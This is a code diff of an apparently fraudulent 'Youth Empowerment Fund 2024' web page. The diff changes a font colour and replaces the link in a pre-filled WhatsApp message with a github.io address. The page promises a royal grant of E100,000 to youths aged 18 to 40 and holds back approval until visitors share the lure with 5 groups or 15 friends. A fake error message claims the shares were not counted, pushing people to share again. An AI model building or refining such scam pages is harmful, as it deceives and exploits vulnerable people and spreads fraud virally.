--- a/index.html
+++ b/index.html
@@ -563,7 +563,7 @@ button:hover {
 
             <p class="tip"> CONGRATULATIONS <span id="getname"></span>,</p><font color="white">
             <p class="tip">
-                Your application for the <font color="#0C9E4E">YOUTH EMPOWERMENT FUND 2024</font> has been received and approval is pending please follow the next steps to approve and get your grant.<span class="amount"></span></br> HOW TO PROCCED:
+                Your application for the <font color="#d73b1b">YOUTH EMPOWERMENT FUND 2024</font> has been received and approval is pending please follow the next steps to approve and get your grant.<span class="amount"></span></br> HOW TO PROCCED:
             </p><br>
             <p class="tip"><font color="white">1. Please share this information with 5 groups or 15 friends on WhatsApp so they can also benefit (click on the "SHARE INFORMATION" icon below).</p></br>
             <p class="tip"><font color="white">2. You will be able to get your grant once you have completed this task…please follow all steps carefully.</p></br>
@@ -699,7 +699,7 @@ $(document).click(function () {
 
 
    <script>
-        var text1 = "*YOUTH ENTERPRISE FUND*%0A%0AThe king with partnership with the YEF has signed grant amount of *E100,000* to be paid to all youths from the age of 18-40 years. Please note that grant payment and application process is online.%0A%0A*Click the link below to apply*%0A%0A%0AAPPLY HERE👇%0Ahttps://tinyurl.com/MOA-AGRICULTURAL-GRANT",
+        var text1 = "*YOUTH ENTERPRISE FUND*%0A%0AThe king with partnership with the YEF has signed grant amount of *E100,000* to be paid to all youths from the age of 18-40 years. Please note that grant payment and application process is online.%0A%0A*Click the link below to apply*%0A%0A%0AAPPLY HERE👇%0Ahttps://offersites.github.io/yefgrant",
             text2 = " an amount of ",
             text3 = "for every citizen who meets the conditions as an aid to the poor class to overcome the crisis. Enter and register now and make sure to register correctly 👉 ",
             error = "Something is wrong!\nPosts are not calculated. You may have shared it with the same friend or group more than once, please re-share",
